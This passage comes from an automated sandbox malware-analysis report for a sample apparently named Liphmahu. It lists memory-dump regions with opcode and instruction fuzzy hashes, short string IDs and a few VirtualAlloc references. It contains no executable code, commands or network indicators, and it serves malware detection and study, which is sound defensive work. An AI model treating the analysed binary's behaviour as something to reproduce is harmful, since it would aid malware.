                                                                                  • Instruction Fuzzy Hash: 77716D34700614CFCB04EB68D4A8AAEB7B6FF88701F50856AD4069B3A4DF74ED46CB90
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2207982072.0000000005D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D40000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5d40000_Liphmahu.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: ,oq
                                                                                  • API String ID: 0-651702701
                                                                                  • Opcode ID: 0bce02fe694d3752e7033fdebe0ba82a8beb926e453204183f657d72ec78f697
                                                                                  • Instruction ID: ce093b4a9c13c0bd93c9bd5f0851058bf9b7d0cf9233b4dfa5635693cfddcb1a
                                                                                  • Opcode Fuzzy Hash: 0bce02fe694d3752e7033fdebe0ba82a8beb926e453204183f657d72ec78f697
                                                                                  • Instruction Fuzzy Hash: D951AF357001159FCB04DF69D894AAEBBE6FF89310B15806AE905DB375DB31EC01CBA1
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2207982072.0000000005D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D40000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5d40000_Liphmahu.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: poq
                                                                                  • API String ID: 0-1570044193
                                                                                  • Opcode ID: e2c138a6dd4a8a5b2e9008c5f5efdb19560194f6b12882357d56fd1da206471b
                                                                                  • Instruction ID: 1325c102d03dc37d80a5e9f4a2ef5a48c36afab20c52cdc367117cbb6097dd0e
                                                                                  • Opcode Fuzzy Hash: e2c138a6dd4a8a5b2e9008c5f5efdb19560194f6b12882357d56fd1da206471b
                                                                                  • Instruction Fuzzy Hash: AA514D76600104AFCB45AFA8C944D6A7FF7FF8C3147158099E2099B376DA32DC22EB91
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2208427016.0000000005D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D60000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5d60000_Liphmahu.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: (oq
                                                                                  • API String ID: 0-3175707579
                                                                                  • Opcode ID: 0de5ecc5d97a03348bad196ad53364c61a7edc4e0c54c3baed0a4ce0c145dee1
                                                                                  • Instruction ID: d4c64b7356f8dd528700dfb7fc422936fca1682feb1dcaa67b394a645080dcb3
                                                                                  • Opcode Fuzzy Hash: 0de5ecc5d97a03348bad196ad53364c61a7edc4e0c54c3baed0a4ce0c145dee1
                                                                                  • Instruction Fuzzy Hash: 79416C72714244AFCB069FA8D814D597FB6FF89320B1680A6E605DB3B2DA32DC12DB51
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2208427016.0000000005D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D60000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5d60000_Liphmahu.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: 4'kq
                                                                                  • API String ID: 0-3255046985
                                                                                  • Opcode ID: 23ee70013d13e6a91986402a4f2761282b29a8baa47d901100a9ab7926edfdf6
                                                                                  • Instruction ID: 52f89b541524a367908fec9505ebad3b286f9b80be787c5ff370049448ed5591
                                                                                  • Opcode Fuzzy Hash: 23ee70013d13e6a91986402a4f2761282b29a8baa47d901100a9ab7926edfdf6
                                                                                  • Instruction Fuzzy Hash: EA414030B106188FCB04AB68C868A6E77B7FF88704F50451BD4069B354DF74AC47DBA1
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2207982072.0000000005D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D40000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5d40000_Liphmahu.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: (oq
                                                                                  • API String ID: 0-3175707579
                                                                                  • Opcode ID: 7eb22611071273a4f58df1a9790810890d0946ddcf55aecfed4fefb9ab3476c6
                                                                                  • Instruction ID: 39ae4d5fd17561bce62a93d96810cd869b814a51a3ba8ee8bcbedbc9ce985fb0
                                                                                  • Opcode Fuzzy Hash: 7eb22611071273a4f58df1a9790810890d0946ddcf55aecfed4fefb9ab3476c6
                                                                                  • Instruction Fuzzy Hash: AF418A35A006169FCB00CF68C48496AFBB9FF49320B1586A6E425AB292D734F852CFD1
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2208427016.0000000005D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D60000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5d60000_Liphmahu.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: 4'kq
                                                                                  • API String ID: 0-3255046985
                                                                                  • Opcode ID: 30b0cbd65125a3e0bf3cdacf270f52b8aec2d9055e80bff0c394ae7207561258
                                                                                  • Instruction ID: 1ba93061803cdfb90672ea4806aeaa83fa530e62e2ecf3933ecbba2d41af7ac6
                                                                                  • Opcode Fuzzy Hash: 30b0cbd65125a3e0bf3cdacf270f52b8aec2d9055e80bff0c394ae7207561258
                                                                                  • Instruction Fuzzy Hash: BE318F313406149FD308DB28C969B6B77E6EFC8714F10446AE206CB3A5CE36EC42C790
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2208427016.0000000005D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D60000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5d60000_Liphmahu.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: 4'kq
                                                                                  • API String ID: 0-3255046985
                                                                                  • Opcode ID: 7a411c214bd372e38eac97e3124de1d628092af4795476e01ccda1c5e8936765
                                                                                  • Instruction ID: 1dfa610dca5bcee8a0aefda19acb771834882ca896f93fb1d743c3c47da5af33
                                                                                  • Opcode Fuzzy Hash: 7a411c214bd372e38eac97e3124de1d628092af4795476e01ccda1c5e8936765
                                                                                  • Instruction Fuzzy Hash: 7A314D313406149FD308DB29C9A8B2B77EAEFC8704F104469E606CB3A5DE75EC42C790
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2208427016.0000000005D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D60000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5d60000_Liphmahu.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: 4'kq
                                                                                  • API String ID: 0-3255046985
                                                                                  • Opcode ID: 7d6576045165c37614ca049c97006fc5d221b8a319013894c6c79dfa0a715c74
                                                                                  • Instruction ID: 7be4e30927a8e4c2ac604994cf70ae304c671eaa184608b062d36092db56835d
                                                                                  • Opcode Fuzzy Hash: 7d6576045165c37614ca049c97006fc5d221b8a319013894c6c79dfa0a715c74
                                                                                  • Instruction Fuzzy Hash: E9317131640204DFCF059F68C954E9DBBB6FF88320B1540AAEA0A9B365CA32EC57CB50
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2208427016.0000000005D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D60000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5d60000_Liphmahu.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: p<kq
                                                                                  • API String ID: 0-3321991346
                                                                                  • Opcode ID: 7f79729c496fa7e30116b3351e94632df3e8b487e9f65e5dbdec6407d985e538
                                                                                  • Instruction ID: ba7f87a8f991a360eb45f5c5d570a0d839de758a49ea478a1d39b1f66368cbf4
                                                                                  • Opcode Fuzzy Hash: 7f79729c496fa7e30116b3351e94632df3e8b487e9f65e5dbdec6407d985e538
                                                                                  • Instruction Fuzzy Hash: 8F213A753482549FCB12DF29C864AAA7BEABF8E350B054096FC45CB271CA35DC52CB60
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2207785576.0000000005D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D20000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5d20000_Liphmahu.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: 4'kq
                                                                                  • API String ID: 0-3255046985
                                                                                  • Opcode ID: 7eea7e04c209666ad6ba0078e72af6f7d1f3dd7e9601164c98b9e740c0eab516
                                                                                  • Instruction ID: c2cb82c4272951b3b22a857f031e139c4b526510e69fb2bcb6c33c866b874af4
                                                                                  • Opcode Fuzzy Hash: 7eea7e04c209666ad6ba0078e72af6f7d1f3dd7e9601164c98b9e740c0eab516
                                                                                  • Instruction Fuzzy Hash: 6A31BB35D08219DFDB14CFA9D8046FEBBB2FF55306F10806AE061A7251D7389A46CF91
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2208427016.0000000005D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D60000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5d60000_Liphmahu.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: p<kq
                                                                                  • API String ID: 0-3321991346
                                                                                  • Opcode ID: d1a1e7546300ee84ec00f0764262fa86a04adb4f49fb94a1accf70101f9e22bf
                                                                                  • Instruction ID: dab8c4aec884db850e08751b910328fbd0be817ed36201f1b064dc13a3e239b0
                                                                                  • Opcode Fuzzy Hash: d1a1e7546300ee84ec00f0764262fa86a04adb4f49fb94a1accf70101f9e22bf
                                                                                  • Instruction Fuzzy Hash: 36214C743442549FCB11CF2AC854AAA7BEABF8D350B054096FC55CB3B1CA35DC52CB60
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2207982072.0000000005D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D40000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5d40000_Liphmahu.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: ,oq
                                                                                  • API String ID: 0-651702701
                                                                                  • Opcode ID: 809488b8faf6d4a11b442befcbb0171e728a3ef5355c93bf20a44cbf876a9e16
                                                                                  • Instruction ID: 36da6634519c3943dd820a0a22a4f85e1e69f6a910a14374d9331c9bd5b9d238
                                                                                  • Opcode Fuzzy Hash: 809488b8faf6d4a11b442befcbb0171e728a3ef5355c93bf20a44cbf876a9e16
                                                                                  • Instruction Fuzzy Hash: DD117C357002069FCB05DF69C9549AEBBB6AF85300B158066E901DB3B5DB30DD41CBA1
                                                                                  APIs
                                                                                  • VirtualAlloc.KERNEL32(?,?,?,?), ref: 0680116B
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2215546925.0000000006800000.00000040.00000800.00020000.00000000.sdmp, Offset: 06800000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_6800000_Liphmahu.jbxd
                                                                                  Similarity
                                                                                  • API ID: AllocVirtual
                                                                                  • String ID:
                                                                                  • API String ID: 4275171209-0
                                                                                  • Opcode ID: 3a34d5414c7a3d2eff0474bf7f3c65252453528d58f43da408df8396527210f4
                                                                                  • Instruction ID: 87f10c12cf31fba109144f1cb3936ad89658419125cb3abd6adae1d5e9b6eeb5
                                                                                  • Opcode Fuzzy Hash: 3a34d5414c7a3d2eff0474bf7f3c65252453528d58f43da408df8396527210f4
                                                                                  • Instruction Fuzzy Hash: C2118971D002489FDB20CFA9C848BEEBBF5AB48320F108819D555A7250C7759941CB90
                                                                                  APIs
                                                                                  • VirtualAlloc.KERNEL32(?,?,?,?), ref: 0680116B
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2215546925.0000000006800000.00000040.00000800.00020000.00000000.sdmp, Offset: 06800000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_6800000_Liphmahu.jbxd
                                                                                  Similarity
                                                                                  • API ID: AllocVirtual
                                                                                  • String ID:
                                                                                  • API String ID: 4275171209-0
                                                                                  • Opcode ID: 8e6c4b95a7ef4e255b1c932801b47f1e650f05409aaba8e4556056512322ed6c
                                                                                  • Instruction ID: fe4ced70bf03c2778f179b78a7c30ed6d4be56cd29950679932e4c64a92c2e6d
                                                                                  • Opcode Fuzzy Hash: 8e6c4b95a7ef4e255b1c932801b47f1e650f05409aaba8e4556056512322ed6c
                                                                                  • Instruction Fuzzy Hash: 3E1134729002499FDB20DFAAC844BDEBBF5EF88320F208819D559A7250C775A545CFA4
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2207982072.0000000005D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D40000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5d40000_Liphmahu.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: Tekq
                                                                                  • API String ID: 0-2319236580
                                                                                  • Opcode ID: e6d7c93de9445ab8729f82226592ca8faa1159c2c8610a4c1b50abac90c67d0c
                                                                                  • Instruction ID: e9c328aced3f8883a40a920dcab046aa49d9958d7319720aeae9ff90c8ac4c48
                                                                                  • Opcode Fuzzy Hash: e6d7c93de9445ab8729f82226592ca8faa1159c2c8610a4c1b50abac90c67d0c
                                                                                  • Instruction Fuzzy Hash: 87116674E04218CFDB54DF69CC447EDBBB6EB89301F4080AAE548AB340DB70AE848F91
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2216506456.0000000006C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C60000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_6c60000_Liphmahu.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: z
                                                                                  • API String ID: 0-1657960367
                                                                                  • Opcode ID: 7c9ed6372ee5c61cd40dc18287e1e345f703e5e44b93201f1a4d924aaf97f690
                                                                                  • Instruction ID: 14d0b22f50b2276da9e19927c0fa17358ec75c06dff634124b7aaf5f36008ec5
                                                                                  • Opcode Fuzzy Hash: 7c9ed6372ee5c61cd40dc18287e1e345f703e5e44b93201f1a4d924aaf97f690
                                                                                  • Instruction Fuzzy Hash: 1311F870A0411A8FEBA4DF58C994BADB7B1FB49304F1085E5E11DB7240DB709EC88F55
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2208427016.0000000005D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D60000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5d60000_Liphmahu.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 013e98e8a0ab447f9048b29855542499a8b9106b7ddb59656fa5a5302848f358
                                                                                  • Instruction ID: e98aaf22914815c823b048626ad8cf4132bbff95310d40c9451495d42d1fda74
                                                                                  • Opcode Fuzzy Hash: 013e98e8a0ab447f9048b29855542499a8b9106b7ddb59656fa5a5302848f358
                                                                                  • Instruction Fuzzy Hash: D412BD34B102198FCB14EF64C994A9DB7B2FF89300F5185AAD54AAB365DF30ED86CB50
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2208427016.0000000005D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D60000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5d60000_Liphmahu.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 62c35cfaeb0a352e75576ac4a70efe8b6fadc8307d1d7391348ae6710f093e2b
                                                                                  • Instruction ID: 67cf068472a093851b469d8697045ad27c18bf72ce805a6f9db30b78777ce58b
                                                                                  • Opcode Fuzzy Hash: 62c35cfaeb0a352e75576ac4a70efe8b6fadc8307d1d7391348ae6710f093e2b
                                                                                  • Instruction Fuzzy Hash: C5A12C35E0061A8FCB11DFA5E855AFEBBB1FF48301F148116E852A7368DB789946CF50
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2208427016.0000000005D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D60000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5d60000_Liphmahu.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 963f2dd21c85440776c7d6799232528e750721ff44a1601e3b5edcfbed48f854
                                                                                  • Instruction ID: 069f6338fde3adb1727cd883aa8f0c53ca8531d0cc29485998ef0632b6974f24
                                                                                  • Opcode Fuzzy Hash: 963f2dd21c85440776c7d6799232528e750721ff44a1601e3b5edcfbed48f854
                                                                                  • Instruction Fuzzy Hash: 7F81F930750614DFCB04EF68D898A6DB7B6FF89710F54416AE5069B3A5CB74EC42CB90
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2208427016.0000000005D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D60000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5d60000_Liphmahu.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 96a07c81caa994e5d0b5b3da1719dfc307d1eec7e5db4c7c8d93bb076f8b1fd3
                                                                                  • Instruction ID: 20b4f3271505c025c95bd546b93051f4769e2b789693ff28a0ca7231e21e6d07
                                                                                  • Opcode Fuzzy Hash: 96a07c81caa994e5d0b5b3da1719dfc307d1eec7e5db4c7c8d93bb076f8b1fd3
                                                                                  • Instruction Fuzzy Hash: 51810635A00618CFCB14DF68C59499EBBF6FF88710B1581AAE816DB365DB31ED42CB90
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2207982072.0000000005D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D40000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5d40000_Liphmahu.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 43cae825a99dcc7b50fa86309c73495b42a4a514dc9adebca73472b3d3257624
                                                                                  • Instruction ID: 3f543754faaa82bddadc74f3f7d9aa13b4b49b3f38ca51c4cc4934bb98f1c0d9
                                                                                  • Opcode Fuzzy Hash: 43cae825a99dcc7b50fa86309c73495b42a4a514dc9adebca73472b3d3257624
                                                                                  • Instruction Fuzzy Hash: C8615C35B012059FCB05DF69E558AAEBBB2FF88351F24806AF516A73A0CB35D905CF60
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2208427016.0000000005D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D60000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5d60000_Liphmahu.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 35db1c6543bb0ed389ad0bd64621b1c4f0379d22ba47dfee118b83133c4181a0
                                                                                  • Instruction ID: 05135cf4560f2940ea2cd2bddeef83d95d5caf6818a07e6be87770781d080cc5
                                                                                  • Opcode Fuzzy Hash: 35db1c6543bb0ed389ad0bd64621b1c4f0379d22ba47dfee118b83133c4181a0
                                                                                  • Instruction Fuzzy Hash: DA612A75B10614DFCB04EF68D898A6DB7B6FF89710F10816AE5069B3A5DB34EC42CB90
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2208427016.0000000005D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D60000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5d60000_Liphmahu.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 02762bd7b5fcc7743abd79985aae62db86987741d0dcf5a483f1e5031dfad843
                                                                                  • Instruction ID: d5c3bb77a02e899a747de6847556efba0473cb3d7fe72da764bc67a1e28a8a89
                                                                                  • Opcode Fuzzy Hash: 02762bd7b5fcc7743abd79985aae62db86987741d0dcf5a483f1e5031dfad843
                                                                                  • Instruction Fuzzy Hash: EF518F34B10609DFCB04DF68E468AAEBBB6FF88711F10811AF50297364DF349946CB90
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2207982072.0000000005D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D40000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5d40000_Liphmahu.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: ae617cf9fbbb67ac38090e901e5cd22af3266ad7e253cc63ed3351a95148db4e
                                                                                  • Instruction ID: f69b2e5edaa792501567b483f4dc35e9f22e81252dde48111362f7ac25841388
                                                                                  • Opcode Fuzzy Hash: ae617cf9fbbb67ac38090e901e5cd22af3266ad7e253cc63ed3351a95148db4e
                                                                                  • Instruction Fuzzy Hash: 9451C370E01208DFDB58DFB9D594A9DBBF2BF89301F20852AE416AB365DB359981CF40
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2207982072.0000000005D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D40000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5d40000_Liphmahu.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 839a0dc0c239931f1e0a3df55a6893e02e426d3103436c6a6f92bb65aae8c600
                                                                                  • Instruction ID: 6bc3f2a4bbce282963749252198fa301a71d024502d79ffeba2cfb53eb94f127
                                                                                  • Opcode Fuzzy Hash: 839a0dc0c239931f1e0a3df55a6893e02e426d3103436c6a6f92bb65aae8c600
                                                                                  • Instruction Fuzzy Hash: 3841E570E01208DFDB58CFB9D584A9DBBB2BF88300F20852EE416AB365DB319981CF40
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2208427016.0000000005D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D60000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5d60000_Liphmahu.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 0d210a32614f2646e10a5e07c57f179383d1588d4ba53d330698111f111945fd
                                                                                  • Instruction ID: 61ab45688357743dabdb3d44161ec5a99aeeea2d80d541715a8f316d7c94f19e
                                                                                  • Opcode Fuzzy Hash: 0d210a32614f2646e10a5e07c57f179383d1588d4ba53d330698111f111945fd
                                                                                  • Instruction Fuzzy Hash: 7931E476610504DFCB05DF98D898EA9BBB2FF48324F1680A9E509AB372C731EC55CB40
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2207982072.0000000005D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D40000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5d40000_Liphmahu.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 93a71fcab3c74d6239c723bacd293d3fd103c2fa2c5cde7b41f5e446379baf10
                                                                                  • Instruction ID: e0055d9aa1ca0291628052a405d6738fa3fa7db50d0122e8ca72be94a4dc230d
                                                                                  • Opcode Fuzzy Hash: 93a71fcab3c74d6239c723bacd293d3fd103c2fa2c5cde7b41f5e446379baf10
                                                                                  • Instruction Fuzzy Hash: 91417971A002168FCB14CFA5D955ABEBBB2FF48305F00812AD856E7361D735DA05CF90
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2207982072.0000000005D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D40000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5d40000_Liphmahu.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 4e940c18b81061e7222a29365a676dc36e74819d887cd6b06f94e1c97079ab6c
                                                                                  • Instruction ID: ac83e05199eedd029b1abeca12dea05b77246ee472c228788d7ff2b366e88bdd
                                                                                  • Opcode Fuzzy Hash: 4e940c18b81061e7222a29365a676dc36e74819d887cd6b06f94e1c97079ab6c
                                                                                  • Instruction Fuzzy Hash: CC41F1B5E05608DFEB44DFA9D844AAEBBF2FB99300F10806AE445BB354D7349A41CF61
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2207982072.0000000005D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D40000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5d40000_Liphmahu.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: f274aa64a3f71235a902cd780637d6ab19968e3af285f41d5032129f97758916
                                                                                  • Instruction ID: 748b1840fa60bf24af43a26d34ed12cf02274fffa5475225652a7aad9335aeb9
                                                                                  • Opcode Fuzzy Hash: f274aa64a3f71235a902cd780637d6ab19968e3af285f41d5032129f97758916
                                                                                  • Instruction Fuzzy Hash: D3411671A45608DFDB40EFA9D844AAEBBF2FB99310F10806AE405FB344D7359A41CFA1
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2208427016.0000000005D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D60000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5d60000_Liphmahu.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 878ce7f1333fa1c29c97a40283e9b1c88167b7f460bb5598d7b0dac71bd3b19c
                                                                                  • Instruction ID: 76b51167bd62fbe5c36bb15694aa4ef5168f8195e26238c54f1125bbd30ec5ea
                                                                                  • Opcode Fuzzy Hash: 878ce7f1333fa1c29c97a40283e9b1c88167b7f460bb5598d7b0dac71bd3b19c
                                                                                  • Instruction Fuzzy Hash: 3A31FB35B001199BDB14EFA4D855AEEB7B6FF88311F108126D805BB3A4DB35AD06CFA0
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2207982072.0000000005D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D40000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5d40000_Liphmahu.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: c59d6ae839e4c856f82d9510b828258e6a98104e6de6b894873356e7af77943a
                                                                                  • Instruction ID: c6fa5c40f81d054b39346e58c096c5b53191238826adbfdd4f440f99319ecd27
                                                                                  • Opcode Fuzzy Hash: c59d6ae839e4c856f82d9510b828258e6a98104e6de6b894873356e7af77943a
                                                                                  • Instruction Fuzzy Hash: 6341E570E04608DFEB44DFAAD844AAEBBF2FB98310F10806AE445BB354E7749A41CF51
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2207982072.0000000005D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D40000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5d40000_Liphmahu.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 4a31ae11914e792d6c80a718e2f25675878c506a9c5c4a5e1753e8adae227c01
                                                                                  • Instruction ID: 82e516b4ac2f148d051742c9acbec107cd852f17507281f61593f24b2b12ff02
                                                                                  • Opcode Fuzzy Hash: 4a31ae11914e792d6c80a718e2f25675878c506a9c5c4a5e1753e8adae227c01
                                                                                  • Instruction Fuzzy Hash: A541E470A85219CFDB64DF68C945BADBBF3FB49301F2080AAD549BB245DB709985CF00
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2208427016.0000000005D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D60000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5d60000_Liphmahu.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: e8db0ce3ca9048a7a23d52b6748e3ce0a96b7c7c834408df6afddb10eb1a7d86
